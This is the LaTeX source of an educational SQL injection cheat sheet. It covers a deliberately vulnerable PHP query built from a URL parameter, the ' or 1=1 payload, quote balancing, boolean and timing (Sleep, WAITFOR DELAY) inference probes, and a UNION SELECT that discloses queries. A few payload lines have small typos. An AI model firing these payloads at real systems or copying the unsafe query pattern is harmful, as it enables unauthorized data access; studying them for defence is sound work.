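% SQL Injection Cheat Sheet -- Cheatography export (cheatography.com/44948/cs/13343/).
% Layout: a two-column multicols* body built from fixed-width tabularx blocks,
% one block per topic, with row colours alternating via \SetRowColor.
% Source hygiene: every "% Row ..." marker is a comment to end of line, so each
% must sit on its own line; joining lines hides the row that follows it.
\documentclass[10pt,a4paper]{article}

% Packages
\usepackage{fancyhdr} % For header and footer
\usepackage{multicol} % Allows multicols in tables
\usepackage{tabularx} % Intelligent column widths
\usepackage{tabulary} % Used in header and footer
\usepackage{hhline} % Border under tables
\usepackage{graphicx} % For images
\usepackage{xcolor} % For hex colours
%\usepackage[utf8x]{inputenc} % For unicode character support
\usepackage[T1]{fontenc} % Without this we get weird character replacements
\usepackage{colortbl} % For coloured tables
\usepackage{setspace} % For line height
\usepackage{lastpage} % Needed for total page number
\usepackage{seqsplit} % Splits long words.
%\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely.
\usepackage[normalem]{ulem} % For underlining links
% Most of the following are not required for the majority
% of cheat sheets but are needed for some symbol support.
\usepackage{amsmath} % Symbols
\usepackage{MnSymbol} % Symbols
\usepackage{wasysym} % Symbols
%\usepackage[english,german,french,spanish,italian]{babel} % Languages

% Document Info
\author{binca}
\pdfinfo{
  /Title (sql-injection.pdf)
  /Creator (Cheatography)
  /Author (binca)
  /Subject (SQL Injection Cheat Sheet)
}

% Lengths and widths
\addtolength{\textwidth}{6cm}
\addtolength{\textheight}{-1cm}
\addtolength{\hoffset}{-3cm}
\addtolength{\voffset}{-2cm}
\setlength{\tabcolsep}{0.2cm} % Space between columns
\setlength{\headsep}{-12pt} % Reduce space between header and content
\setlength{\headheight}{85pt} % If less, LaTeX automatically increases it
\renewcommand{\footrulewidth}{0pt} % Remove footer line
\renewcommand{\headrulewidth}{0pt} % Remove header line
\renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit

% These two commands together give roughly
% the right line height in the tables
\renewcommand{\arraystretch}{1.3}
\onehalfspacing

% Commands
% \SetRowColor stores the colour name globally so \mymulticolumn can reuse it
% for \columncolor inside the same row.
\newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour
\newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols
\newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns
\newcommand{\tn}{\tabularnewline} % Required as custom column type in use

% Font and Colours
\definecolor{HeadBackground}{HTML}{333333}
\definecolor{FootBackground}{HTML}{666666}
\definecolor{TextColor}{HTML}{333333}
\definecolor{DarkBackground}{HTML}{918027}
\definecolor{LightBackground}{HTML}{F8F7F1}
\renewcommand{\familydefault}{\sfdefault}
\color{TextColor}

% Header and Footer
\pagestyle{fancy}
\fancyhead{} % Set header to blank
\fancyfoot{} % Set footer to blank
\fancyhead[L]{
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{C}
    \SetRowColor{DarkBackground}
    \vspace{-7pt}
    {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent
        \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}}
    }
\end{tabulary}
\columnbreak
\begin{tabulary}{11cm}{L}
    \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{SQL Injection Cheat Sheet}}}} \\
    \normalsize{by \textcolor{DarkBackground}{binca} via \textcolor{DarkBackground}{\uline{cheatography.com/44948/cs/13343/}}}
\end{tabulary}
\end{multicols}}

\fancyfoot[L]{
\footnotesize
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{LL}
  \SetRowColor{FootBackground}
  \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}}  \\
  \vspace{-2pt}binca \\
  \uline{cheatography.com/binca} \\
  \end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}}  \\
   \vspace{-2pt}Not Yet Published.\\
   Updated 9th November, 2017.\\
   Page {\thepage} of \pageref{LastPage}.
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}}  \\
  \SetRowColor{white}
  \vspace{-5pt}
  %\includegraphics[width=48px,height=48px]{dave.jpeg}
  Measure your website readability!\\
  www.readability-score.com
\end{tabulary}
\end{multicols}}

\begin{document}
\raggedright
\raggedcolumns

% Set font size to small. Switch to any value
% from this page to resize cheat sheet text:
% www.emerson.emory.edu/services/latex/latex_169.html
\footnotesize % Small font.

\begin{multicols*}{2}

% Section: Intro
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Intro}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Perhaps the most well-known web app flaw} \tn
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Easier to address from an app security perspective, but remains a common flaw.} \tn
% Row Count 3 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Apps employ relational databases for a multitude of reasons} \tn
% Row Count 5 (+ 2)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{App interfaces to add, update and render data} \tn
% Row Count 6 (+ 1)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Flaw originates from app allowing user-supplied input to be dynamically used in a SQL query} \tn
% Row Count 8 (+ 2)
% Row 5
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Numerous different Relational Database Management Systems in use including Oracle, MySQL, MSSQL} \tn
% Row Count 10 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% Section: Key SQL Verbs
\begin{tabularx}{8.4cm}{x{1.6 cm} x{6.4 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Key SQL Verbs}}  \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{SELECT}} & Retrieves data from tables, most commonly used \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
{\bf{INSERT}} & Add data to table \tn
% Row Count 4 (+ 2)
% Row 2
\SetRowColor{LightBackground}
{\bf{UPDATE}} & Modify existing data \tn
% Row Count 6 (+ 2)
% Row 3
\SetRowColor{white}
{\bf{DELETE}} & Delete data in a table \tn
% Row Count 8 (+ 2)
% Row 4
\SetRowColor{LightBackground}
{\bf{DROP}} & Delete a table \tn
% Row Count 9 (+ 1)
% Row 5
\SetRowColor{white}
{\bf{UNION}} & Combine data from multiple queries \tn
% Row Count 11 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

% Section: SQL Query Modifiers
\begin{tabularx}{8.4cm}{x{2.32 cm} x{5.68 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{SQL Query Modifiers}}  \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{WHERE}} & Filter SQL query to apply only when a condition is met \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
{\emph{AND/OR}}* & Combine WHERE conditions to narrow the SQL query \tn
% Row Count 4 (+ 2)
% Row 2
\SetRowColor{LightBackground}
{\bf{LIMIT \#1, \#2}} & Limits rows returned to \#2 rows starting at offset \#1; same results with {\bf{LIMIT 2 OFFSET 1}} \tn
% Row Count 8 (+ 4)
% Row 3
\SetRowColor{white}
{\bf{ORDER BY {[}\#{]}}} & Sort by column number \tn
% Row Count 10 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

% Section: Important SQL Data Types
\begin{tabularx}{8.4cm}{x{2.64 cm} x{5.36 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Important SQL Data Types}}  \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{bool}} & Boolean True/False \tn
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
{\bf{int}} & Integer \tn
% Row Count 2 (+ 1)
% Row 2
\SetRowColor{LightBackground}
{\bf{char}} & Fixed length string \tn
% Row Count 3 (+ 1)
% Row 3
\SetRowColor{white}
{\bf{varchar}} & Variable length string \tn
% Row Count 4 (+ 1)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{{\bf{binary}}} \tn
% Row Count 5 (+ 1)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{Note: Names for data types may vary across RDBMSs}  \tn
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

% Section: SQL Special Characters
\begin{tabularx}{8.4cm}{x{2.56 cm} x{5.44 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{SQL Special Characters}}  \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{ ' , " }} & String delimiter \tn
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
{\bf{ ; }} & Terminates a SQL statement \tn
% Row Count 2 (+ 1)
% Row 2
\SetRowColor{LightBackground}
{\bf{ -{}- , \# , /* }} & Comment delimiters \tn
% Row Count 4 (+ 2)
% Row 3
\SetRowColor{white}
{\bf{ \% , * }} & Wildcard characters \tn
% Row Count 5 (+ 1)
% Row 4
\SetRowColor{LightBackground}
{\bf{ || , + , " " }} & String concatenation characters \tn
% Row Count 7 (+ 2)
% Row 5
\SetRowColor{white}
{\bf{ + , \textless{} , \textgreater{} , = }} & Mathematical operators \tn
% Row Count 9 (+ 2)
% Row 6
\SetRowColor{LightBackground}
{\bf{ = }} & Test for equivalence \tn
% Row Count 10 (+ 1)
% Row 7
\SetRowColor{white}
{\bf{ ( ) }} & Calling functions, sub-queries, and INSERTs \tn
% Row Count 12 (+ 2)
% Row 8
\SetRowColor{LightBackground}
{\bf{ \%00 }} & Null byte \tn
% Row Count 13 (+ 1)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

% Section: SQL Injection Example Code (single multi-line cell; the "% Row Count"
% markers sit between \newline breaks inside the cell)
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{SQL Injection Example Code}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Server-side PHP code taking the value of the URL query parameter name and interpolating it directly into a SQL SELECT \newline
% Row Count 2 (+ 2)
` \$ sql="SELECT * FROM Users WHERE lname='\$\_GET{[}"name"{]}';" ` \newline
% Row Count 4 (+ 2)
The resulting query if normal input is John \newline
% Row Count 5 (+ 1)
URL: \seqsplit{http://url/sqli.php?name=John} \newline
% Row Count 6 (+ 1)
SQL Query: SELECT * FROM Users WHERE lname='John'; \newline
% Row Count 8 (+ 2)
Normal result. \newline
% Row Count 9 (+ 1)
Injected Input Query \newline
% Row Count 10 (+ 1)
Input is John' \newline
% Row Count 11 (+ 1)
URL: \seqsplit{http://url/sqli.php?name=John'} \newline
% Row Count 12 (+ 1)
SQL Query: SELECT * FROM Users WHERE lname='John''; \newline
% Row Count 14 (+ 2)
Stray ' causes error. \newline
% Row Count 15 (+ 1)
Injected Input Query 2 \newline
% Row Count 16 (+ 1)
Input is John'; -{}- \newline
% Row Count 17 (+ 1)
URL: http://url/sqli.php?name=John';-{}- \newline
% Row Count 18 (+ 1)
SQL Query: SELECT * FROM Users WHERE lname='John';-{}-'; \newline
% Row Count 20 (+ 2)
Normal results.% Row Count 21 (+ 1)
}  \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% Section: ' or 1=1; --
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{' or 1=1; -{}-}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{A payload, or a variation upon it, found in most SQLi documentation} \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{The {\bf{single quote}}* closes out any string.} \tn
% Row Count 3 (+ 1)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{The {\bf{1=1}} changes query logic because it is always true.} \tn
% Row Count 5 (+ 2)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{{\bf{;-{}-}} Ends the payload, completing the statement, and comments out the remaining code to prevent syntax errors} \tn
% Row Count 8 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Note: Some RDBMSs require a space after the "-{}-" comment delimiter.}  \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% Section: SQLi Balancing Act
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{SQLi Balancing Act}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Involves finding correct prefixes, payloads and suffixes to evoke desired behavior.} \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{A significant aspect of discovering SQLi flaws is determining reusable pieces of our injection.} \tn
% Row Count 4 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{The most obvious balancing act is quotes.} \tn
% Row Count 5 (+ 1)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{The most common data type our input will land within is a string, so proper prefixes and suffixes to accommodate strings are necessary.} \tn
% Row Count 8 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Example with comments: John';-{}- \newline SELECT...WHERE lname='John';-{}-'; \newline \newline Example without comments: John' OR '1'='1 \newline SELECT...WHERE lname='John' OR '1'='1';}  \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% Section: Balancing Column Numbers and Data Types
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Balancing Column Numbers and Data Types}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{{\bf{INSERT}} and {\bf{UNION}} statements require us to know the number of columns required or used, otherwise a DB Syntax Error will occur} \tn
% Row Count 3 (+ 3)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{{\bf{INSERT}} and {\bf{UNION}} statements also require the data type associated with the columns to be compatible.} \tn
% Row Count 6 (+ 3)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{{\bf{ORDER BY {[}\#{]}}} is another option where the number is incrementally increased until an error is thrown.} \tn
% Row Count 9 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Note: Numbers and strings are typically compatible.}  \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% Section: Discovery of SQLi
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Discovery of SQLi}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Input locations that leverage/interact with the backend DB, such as login functionality.} \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{HTTP Request portions that are common input locations: \{\{nl\}\} {\bf{GET URL query parameters}} \{\{nl\}\} {\bf{POST payload}} \{\{nl\}\} {\bf{HTTP COOKIE}} \{\{nl\}\} {\bf{HTTP User-agent}}} \tn
% Row Count 6 (+ 4)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{{\bf{HTTP COOKIE}} and {\bf{User-agent}} are more likely to be blind.}  \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% Section: Classes of SQLi
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Classes of SQLi}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{One vulnerability encountered in a variety of ways} \tn
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Simplest categorization is blind versus visible, but there is a spectrum.} \tn
% Row Count 3 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{{\bf{In-Band/Inline SQLi}} is a flaw that allows us to see the result of our injection. It is easier to discover and exploit.} \tn
% Row Count 6 (+ 3)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Blind SQLi}} is the same vulnerability but with no visible response.} \tn
% Row Count 8 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% Section: Error Messages
\begin{tabularx}{8.4cm}{x{3.2 cm} x{4.8 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Error Messages}}  \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{Database Error Messages}} & Not only hint at the presence of SQLi but may guide us in crafting input for exploitation. If you see {\bf{database error messages}} it is NOT blind SQLi \tn
% Row Count 7 (+ 7)
% Row 1
\SetRowColor{white}
{\bf{Custom Error Messages}} & Can require a different approach because the error will not indicate if the input is being interpreted. \tn
% Row Count 12 (+ 5)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

% Section: Equivalent String Injections
\begin{tabularx}{8.4cm}{x{1.368 cm} x{1.368 cm} x{4.864 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{3}{x{8.4cm}}{\bf\textcolor{white}{Equivalent String Injections}}  \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{Prefix}} & {\bf{Suffix}} & {\bf{Note}} \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
{\bf{John'}} & {\bf{;\#}} & Commenting \tn
% Row Count 4 (+ 2)
% Row 2
\SetRowColor{LightBackground}
{\bf{John'}} & {\bf{;-{}-}} & Commenting \tn
% Row Count 6 (+ 2)
% Row 3
\SetRowColor{white}
{\bf{ Jo'/* }} & {\bf{ */'hn }} & Inline Commenting \tn
% Row Count 8 (+ 2)
% Row 4
\SetRowColor{LightBackground}
{\bf{Jo'}} & {\bf{'hn}} & Concatenation (with or without spaces) \tn
% Row Count 10 (+ 2)
% Row 5
\SetRowColor{white}
{\bf{Jo'|}} & {\bf{ |'hn}} & Concatenation \tn
% Row Count 12 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}---}
\SetRowColor{LightBackground}
\mymulticolumn{3}{x{8.4cm}}{Comment delimiters (-{}-, /**/, \#) can allow injections to succeed that would otherwise fail. \newline The -{}- and \# are useful SQL suffixes. \newline Injecting into the middle of a SQL statement/query will not allow us to alter the rest of the SQL statement, but it will show us if our input is being interpreted on the backend when we experience custom error messages (Blind SQLi).}  \tn
\hhline{>{\arrayrulecolor{DarkBackground}}---}
\end{tabularx}
\par\addvspace{1.3em}

% Section: Binary/Boolean Inference Testing
\begin{tabularx}{8.4cm}{x{6.32 cm} p{1.68 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Binary/Boolean Inference Testing}}  \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{John' AND 1;\#}} & True \tn
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
{\bf{John' AND 1=1;\#}} & True \tn
% Row Count 2 (+ 1)
% Row 2
\SetRowColor{LightBackground}
{\bf{John' AND 0;\#}} & False \tn
% Row Count 3 (+ 1)
% Row 3
\SetRowColor{white}
{\bf{John' AND 1=0;\#}} & False \tn
% Row Count 4 (+ 1)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{Infer from whether it evaluates to True (AND 1=1) or False (AND 1=0) \newline Prefix: Dent' AND \newline Evaluates: substr((select table\_name from \seqsplit{information\_schema.tables} limit 1,),1,1) \textgreater{} "a" \newline Suffix: ;\#}  \tn
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

% Section: Blind Timing Inferences
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Blind Timing Inferences}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{When there is no discernible output or errors the use of timing-based inference is a viable option.} \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Relies on the responsiveness of the app for the inference by artificially inducing a delay when a condition evaluates to true.} \tn
% Row Count 5 (+ 3)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Example:\{\{nl\}\} {\bf{Sleep(10) - MySQL}} \{\{nl\}\} {\bf{ WAITFOR DELAY '0:0:10' - MSSQL}}} \tn
% Row Count 7 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% Section: Out-of-Band SQLi
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Out-of-Band SQLi}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{No error messages} \tn
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{No visible responses} \tn
% Row Count 2 (+ 1)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{No boolean/inference opportunities, with or without timing} \tn
% Row Count 4 (+ 2)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Requires an alternative communication channel to discover or exploit these flaws} \tn
% Row Count 6 (+ 2)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Out-of-Band Channels may provide for faster exfiltration from some flaws susceptible to inference techniques. Typically leverages HTTP or DNS to tunnel communications back to an attacker-controlled server} \tn
% Row Count 11 (+ 5)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% Section: Query Disclosure (single multi-line cell, as in the example-code block)
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Query Disclosure}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{{\bf{UNION SELECT}} is used to disclose the vulnerable query we are injecting into. \newline
% Row Count 2 (+ 2)
Payload: \newline
% Row Count 3 (+ 1)
John' UNION SELECT '1','2','3', info FROM \seqsplit{information\_schema.processlist;\#} \newline
% Row Count 5 (+ 2)
Results: \newline
% Row Count 6 (+ 1)
SELECT * FROM Customers WHERE lname='John' UNION SELECT '1','2','3'', info FROM \seqsplit{information\_schema.processlist;\#'}% Row Count 9 (+ 3)
}  \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% That's all folks
\end{multicols*}
\end{document}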